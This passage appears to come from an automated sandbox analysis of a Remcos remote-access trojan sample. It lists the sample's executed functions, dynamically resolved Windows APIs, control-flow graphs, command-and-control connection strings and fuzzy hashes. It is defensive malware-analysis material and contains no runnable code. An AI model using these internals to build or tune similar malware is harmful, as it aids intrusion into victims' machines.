4126d2 29 API calls 47951->47953 47952->47940 47954 40e668 47953->47954 47968 411699 TerminateProcess WaitForSingleObject 47954->47968 47956 40e670 ExitProcess 47969 411637 60 API calls 47962->47969 47964->47940 47965->47940 47966->47939 47967->47946 47968->47956

                        Executed Functions

                        Function 0041BCF3 Relevance: 115.6, APIs: 40, Strings: 26, Instructions: 140libraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD08
                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD11
                        • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD28
                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD2B
                        • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD3D
                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD40
                        • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD51
                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD54
                        • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD65
                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                        • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD75
                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                        • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD85
                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                        • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD95
                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD98
                        • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BDA9
                        • GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                        • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDB9
                        • GetProcAddress.KERNEL32(00000000), ref: 0041BDBC
                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDCD
                        • GetProcAddress.KERNEL32(00000000), ref: 0041BDD0
                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDE1
                        • GetProcAddress.KERNEL32(00000000), ref: 0041BDE4
                        • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDF5
                        • GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                        • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BE05
                        • GetProcAddress.KERNEL32(00000000), ref: 0041BE08
                        • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE16
                        • GetProcAddress.KERNEL32(00000000), ref: 0041BE19
                        • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE26
                        • GetProcAddress.KERNEL32(00000000), ref: 0041BE29
                        • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE3B
                        • GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
                        • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE4B
                        • GetProcAddress.KERNEL32(00000000), ref: 0041BE4E
                        • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE60
                        • GetProcAddress.KERNEL32(00000000), ref: 0041BE63
                        • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE70
                        • GetProcAddress.KERNEL32(00000000), ref: 0041BE73
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$HandleLibraryLoadModule
                        • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                        • API String ID: 384173800-625181639
                        • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                        • Instruction ID: 9dbe04c74af77a7e1246f7e7b4568b240d3cb110e698a9ec5713b860520f9e80
                        • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                        • Instruction Fuzzy Hash: EC31EEA0E4031C7ADA107FB69C49E5B7E9CD940B953110827B508D3162FB7DA980DEEE
                        Function 0040E54F Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 88sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 004124B7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
                          • Part of subcall function 004124B7: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                          • Part of subcall function 004124B7: RegCloseKey.KERNELBASE(?), ref: 00412500
                        • Sleep.KERNELBASE(00000BB8), ref: 0040E603
                        • ExitProcess.KERNEL32 ref: 0040E672
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseExitOpenProcessQuerySleepValue
                        • String ID: 5.3.0 Pro$override$pth_unenc$BG
                        • API String ID: 2281282204-3981147832
                        • Opcode ID: 099a9bf13a86a18ae7ced4af45115ec220a16a2a1b66786f925988895ab02a01
                        • Instruction ID: 5cf4e9032f47a3efac01ff8ef37086889acd92013af90c8396a8a4e29292548f
                        • Opcode Fuzzy Hash: 099a9bf13a86a18ae7ced4af45115ec220a16a2a1b66786f925988895ab02a01
                        • Instruction Fuzzy Hash: 7B21A131B0031027C608767A891BA6F359A9B91719F90443EF805A72D7EE7D8A6083DF
                        Function 00404915 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60timethreadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1179 404915-404924 1180 4049b1 1179->1180 1181 40492a-404931 1179->1181 1182 4049b3-4049b7 1180->1182 1183 404933-404937 1181->1183 1184 404939-404940 1181->1184 1185 404987-4049af CreateEventA CreateThread 1183->1185 1184->1185 1186 404942-404982 GetLocalTime call 41ad56 call 404c9e call 401f66 call 41a696 call 401eea 1184->1186 1185->1182 1186->1185
                        APIs
                        • GetLocalTime.KERNEL32(?), ref: 00404946
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404994
                        • CreateThread.KERNELBASE(00000000,00000000,Function_00004B1D,?,00000000,00000000), ref: 004049A7
                        Strings
                        • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Create$EventLocalThreadTime
                        • String ID: KeepAlive | Enabled | Timeout:
                        • API String ID: 2532271599-1507639952
                        • Opcode ID: d248886e52a7d0ac6cae50da1f59772ac17be00107f66e41d9b0c0522851940d
                        • Instruction ID: b3b3bd05b27f7402d17ec3e4b95caf04d044377deb2a76ff13a13b362c137b93
                        • Opcode Fuzzy Hash: d248886e52a7d0ac6cae50da1f59772ac17be00107f66e41d9b0c0522851940d
                        • Instruction Fuzzy Hash: C2113AB19042543AC710A7BA8C09BCB7FAC9F86364F04407BF50462192D7789845CBFA
                        Function 0043294A Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                        Download Yara Rule
                        APIs
                        • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326D2,00000024,?,?,?), ref: 0043295C
                        • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBCE,?), ref: 00432972
                        • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBCE,?), ref: 00432984
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Crypt$Context$AcquireRandomRelease
                        • String ID:
                        • API String ID: 1815803762-0
                        • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                        • Instruction ID: 265e42ecfadf18463eab4f7c57cd3d944434f2f899047e0b797dffc1cacfdca9
                        • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                        • Instruction Fuzzy Hash: 06E06531318311BBEB310E21BC08F577AE4AF89B72F650A3AF251E40E4D2A288019A1C
                        Function 0041A7B2 Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                        Download Yara Rule
                        APIs
                        • GetComputerNameExW.KERNELBASE(00000001,?,0000002B,00474358), ref: 0041A7CF
                        • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7E7
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Name$ComputerUser
                        • String ID:
                        • API String ID: 4229901323-0
                        • Opcode ID: f3e21b17a5d8a19e2687fa05b240d0301e1fcdfe38c042d63901ddde5ca2efef
                        • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                        • Opcode Fuzzy Hash: f3e21b17a5d8a19e2687fa05b240d0301e1fcdfe38c042d63901ddde5ca2efef
                        • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
                        Function 00426107 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: recv
                        • String ID:
                        • API String ID: 1507349165-0
                        • Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                        • Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
                        • Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                        • Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26
                        Function 0040D767 Relevance: 95.3, APIs: 13, Strings: 41, Instructions: 799COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 5 40d767-40d7e9 call 41bcf3 GetModuleFileNameW call 40e168 call 401fbd * 2 call 41afd3 call 40e8bd call 401d8c call 43e830 22 40d835-40d8fd call 401d64 call 401e8f call 401d64 call 404cbf call 405ce6 call 401eef call 401eea * 2 call 401d64 call 401ebd call 40541d call 401d64 call 404bb1 call 401d64 call 404bb1 5->22 23 40d7eb-40d830 call 40e986 call 401d64 call 401e8f call 40fcba call 40e937 call 40e155 5->23 69 40d950-40d96b call 401d64 call 40b125 22->69 70 40d8ff-40d94a call 4085b4 call 401eef call 401eea call 401e8f call 4124b7 22->70 49 40dc96-40dca7 call 401eea 23->49 80 40d9a5-40d9ac call 40bed7 69->80 81 40d96d-40d98c call 401e8f call 4124b7 69->81 70->69 101 40e134-40e154 call 401e8f call 412902 call 4112b5 70->101 89 40d9b5-40d9bc 80->89 90 40d9ae-40d9b0 80->90 81->80 97 40d98e-40d9a4 call 401e8f call 412902 81->97 94 40d9c0-40d9cc call 41a473 89->94 95 40d9be 89->95 93 40dc95 90->93 93->49 105 40d9d5-40d9d9 94->105 106 40d9ce-40d9d0 94->106 95->94 97->80 108 40da18-40da2b call 401d64 call 401e8f 105->108 109 40d9db call 40697b 105->109 106->105 127 40da32-40daba call 401d64 call 41ae18 call 401e18 call 401e13 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f 108->127 128 40da2d call 4069ba 108->128 117 40d9e0-40d9e2 109->117 120 40d9e4-40d9e9 call 40699d call 4064d0 117->120 121 40d9ee-40da01 call 401d64 call 401e8f 117->121 120->121 121->108 138 40da03-40da09 121->138 163 40db22-40db26 127->163 164 40dabc-40dad5 call 401d64 call 401e8f call 43a621 127->164 128->127 138->108 139 40da0b-40da11 138->139 139->108 141 40da13 call 4064d0 139->141 141->108 166 40dcaa-40dd01 call 436060 call 4022f8 call 401e8f * 2 call 41265d call 4082d7 163->166 167 40db2c-40db33 163->167 164->163 191 40dad7-40db1d call 401d64 call 401e8f call 401d64 call 401e8f call 40c89e call 401e18 call 401e13 164->191 222 40dd06-40dd5c call 401d64 call 401e8f call 401f66 call 401e8f call 4126d2 call 401d64 call 401e8f call 43a5f7 166->222 169 40dbb1-40dbbb call 4082d7 167->169 170 40db35-40dbaf call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 40bc67 167->170 177 40dbc0-40dbe4 call 4022f8 call 4338d8 169->177 170->177 198 40dbf3 177->198 199 40dbe6-40dbf1 call 436060 177->199 191->163 204 40dbf5-40dc40 call 401e07 call 43e359 call 4022f8 call 401e8f call 4022f8 call 401e8f call 4128a2 198->204 199->204 259 40dc45-40dc6a call 4338e1 call 401d64 call 40b125 204->259 273 40dd79-40dd7b 222->273 274 40dd5e 222->274 259->222 272 40dc70-40dc91 call 401d64 call 41ae18 call 40e219 259->272 272->222 292 40dc93 272->292 275 40dd81 273->275 276 40dd7d-40dd7f 273->276 278 40dd60-40dd77 call 41bec0 CreateThread 274->278 279 40dd87-40de66 call 401f66 * 2 call 41a696 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 43a5f7 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f StrToIntA call 409517 call 401d64 call 401e8f 275->279 276->278 278->279 330 40dea1 279->330 331 40de68-40de9f call 43361d call 401d64 call 401e8f CreateThread 279->331 292->93 332 40dea3-40debb call 401d64 call 401e8f 330->332 331->332 343 40def9-40df0c call 401d64 call 401e8f 332->343 344 40debd-40def4 call 43361d call 401d64 call 401e8f CreateThread 332->344 354 40df6c-40df7f call 401d64 call 401e8f 343->354 355 40df0e-40df67 call 401d64 call 401e8f call 401d64 call 401e8f call 40c854 call 401e18 call 401e13 CreateThread 343->355 344->343 365 40df81-40dfb5 call 401d64 call 401e8f call 401d64 call 401e8f call 43a5f7 call 40b95c 354->365 366 40dfba-40dfde call 41a7b2 call 401e18 call 401e13 354->366 355->354 365->366 388 40dfe0-40dfe1 SetProcessDEPPolicy 366->388 389 40dfe3-40dff6 CreateThread 366->389 388->389 390 40e004-40e00b 389->390 391 40dff8-40e002 CreateThread 389->391 394 40e019-40e020 390->394 395 40e00d-40e017 CreateThread 390->395 391->390 398 40e022-40e025 394->398 399 40e033-40e038 394->399 395->394 401 40e073-40e08e call 401e8f call 41246e 398->401 402 40e027-40e031 398->402 404 40e03d-40e06e call 401f66 call 404c9e call 401f66 call 41a696 call 401eea 399->404 413 40e094-40e0d4 call 41ae18 call 401e07 call 412584 call 401e13 call 401e07 401->413 414 40e12a-40e12f call 40cbac call 413fd4 401->414 402->404 404->401 433 40e0ed-40e0f2 DeleteFileW 413->433 414->101 434 40e0f4-40e125 call 41ae18 call 401e07 call 41297a call 401e13 * 2 433->434 435 40e0d6-40e0d9 433->435 434->414 435->434 436 40e0db-40e0e8 Sleep call 401e07 435->436 436->433
                        APIs
                          • Part of subcall function 0041BCF3: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD08
                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD11
                          • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD28
                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD2B
                          • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD3D
                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD40
                          • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD51
                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD54
                          • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD65
                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                          • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD75
                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                          • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD85
                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                          • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD95
                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD98
                          • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BDA9
                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                          • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDB9
                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDBC
                          • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDCD
                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD0
                          • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDE1
                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE4
                          • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDF5
                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                          • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BE05
                          • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BE08
                          • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE16
                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Material requirements_1.pif.exe,00000104), ref: 0040D790
                          • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                        • String ID: (CG$(CG$0DG$@CG$@CG$Access Level: $Administrator$C:\Users\user\Desktop\Material requirements_1.pif.exe$Exe$Inj$Remcos Agent initialized$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
                        • API String ID: 2830904901-1556804466
                        • Opcode ID: 27a01aff42a579400e3101b255f1ec488547eb91d73c3514a06912c85c481647
                        • Instruction ID: 3e021a1a4b13f59cbd2257f1e4af8b1458c06fff599f70b9144805750af3581d
                        • Opcode Fuzzy Hash: 27a01aff42a579400e3101b255f1ec488547eb91d73c3514a06912c85c481647
                        • Instruction Fuzzy Hash: 31329260B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E
                        Function 00413FD4 Relevance: 48.1, APIs: 5, Strings: 22, Instructions: 813sleepnetworkCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 447 413fd4-41401f call 401faa call 41aa83 call 401faa call 401d64 call 401e8f call 43a5f7 460 414021-414028 Sleep 447->460 461 41402e-41407c call 401f66 call 401d64 call 401fbd call 41afd3 call 404262 call 401d64 call 40b125 447->461 460->461 476 4140f0-41418a call 401f66 call 401d64 call 401fbd call 41afd3 call 401d64 * 2 call 4085b4 call 4027cb call 401eef call 401eea * 2 call 401d64 call 405422 461->476 477 41407e-4140ed call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 404101 461->477 530 41419a-4141a1 476->530 531 41418c-414198 476->531 477->476 532 4141a6-414242 call 40541d call 404cbf call 405ce6 call 4027cb call 401f66 call 41a696 call 401eea * 2 call 401d64 call 401e8f call 401d64 call 401e8f call 413f9a 530->532 531->532 559 414244-41428a WSAGetLastError call 41bc86 call 404c9e call 401f66 call 41a696 call 401eea 532->559 560 41428f-41429d call 4041f1 532->560 583 414b54-414b66 call 4047eb call 4020b4 559->583 566 4142ca-4142d8 call 404915 call 40428c 560->566 567 41429f-4142c5 call 401f66 * 2 call 41a696 560->567 579 4142dd-4142df 566->579 567->583 582 4142e5-414432 call 401d64 * 2 call 404cbf call 405ce6 call 4027cb call 405ce6 call 4027cb call 401f66 call 41a696 call 401eea * 4 call 41a97d call 413683 call 4082dc call 440c61 call 401d64 call 401fbd call 4022f8 call 401e8f * 2 call 41265d 579->582 579->583 647 414434-414441 call 40541d 582->647 648 414446-41446d call 401e8f call 412513 582->648 596 414b68-414b88 call 401d64 call 401e8f call 43a5f7 Sleep 583->596 597 414b8e-414b96 call 401d8c 583->597 596->597 597->476 647->648 654 414474-414ac7 call 403b40 call 40cbf1 call 41adfe call 41aed8 call 41ad56 call 401d64 GetTickCount call 41ad56 call 41acb0 call 41ad56 * 2 call 41ac62 call 41aed8 * 5 call 40e679 call 41aed8 call 4027ec call 40275c call 4027cb call 40275c call 4027cb * 3 call 40275c call 4027cb call 405ce6 call 4027cb call 405ce6 call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 405ce6 call 4027cb * 5 call 40275c call 4027cb call 40275c call 4027cb * 7 call 40275c call 404468 call 401eea * 50 call 401e13 call 401eea * 6 call 401e13 call 4045d5 648->654 655 41446f-414471 648->655 901 414ac9-414ad0 654->901 902 414adb-414ae2 654->902 655->654 901->902 903 414ad2-414ad4 901->903 904 414ae4-414ae9 call 40a767 902->904 905 414aee-414b20 call 405415 call 401f66 * 2 call 41a696 902->905 903->902 904->905 916 414b22-414b2e CreateThread 905->916 917 414b34-414b4f call 401eea * 2 call 401e13 905->917 916->917 917->583
                        APIs
                        • Sleep.KERNEL32(00000000,00000029,004742F8,?,00000000), ref: 00414028
                        • WSAGetLastError.WS2_32 ref: 00414249
                        • Sleep.KERNELBASE(00000000,00000002), ref: 00414B88
                          • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep$ErrorLastLocalTime
                        • String ID: | $%I64u$5.3.0 Pro$@CG$C:\Users\user\Desktop\Material requirements_1.pif.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$TLS Off$TLS On $XCG$XCG$XCG$`=G$dCG$hlight$name$>G$>G$BG
                        • API String ID: 524882891-4004264548
                        • Opcode ID: 9fbcf082b9712a934eb7fcb763e3e8452ffb3661f93586d2b4f69cd9451bafcd
                        • Instruction ID: 1c0fcd5d2769b0c1ed3f5537d8c306574ebe830810c6f13c8178cbf41d879861
                        • Opcode Fuzzy Hash: 9fbcf082b9712a934eb7fcb763e3e8452ffb3661f93586d2b4f69cd9451bafcd
                        • Instruction Fuzzy Hash: 3B525E31A001145ADB18F771DDA6AEE73A59F90708F1041BFB80A771E2EF385E85CA9D
                        Function 0040428C Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 147networkCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • connect.WS2_32(?,?,?), ref: 004042A5
                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                        • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                          • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateEvent$ErrorLastLocalTimeconnect
                        • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                        • API String ID: 994465650-2151626615
                        • Opcode ID: 2601ad7ba584dd83cc4b687a7b2e5622e4b8e2ffaa9cdc4205b416171ec1cd63
                        • Instruction ID: feeaa4dc0a5480c3be004408dd81f6e2390fe6c9429734df96c13844dfc6b1ca
                        • Opcode Fuzzy Hash: 2601ad7ba584dd83cc4b687a7b2e5622e4b8e2ffaa9cdc4205b416171ec1cd63
                        • Instruction Fuzzy Hash: 3E4116B1B002026BCB04B77A8C4B66E7A55AB81354B40016FE901676D3FE79AD6087DF
                        Function 004047EB Relevance: 18.1, APIs: 12, Instructions: 66synchronizationCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                        • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                        • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                        • closesocket.WS2_32(000000FF), ref: 0040481F
                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404856
                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404867
                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040486E
                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404880
                        • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404885
                        • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040488A
                        • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404895
                        • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 0040489A
                        Memory Dump Source
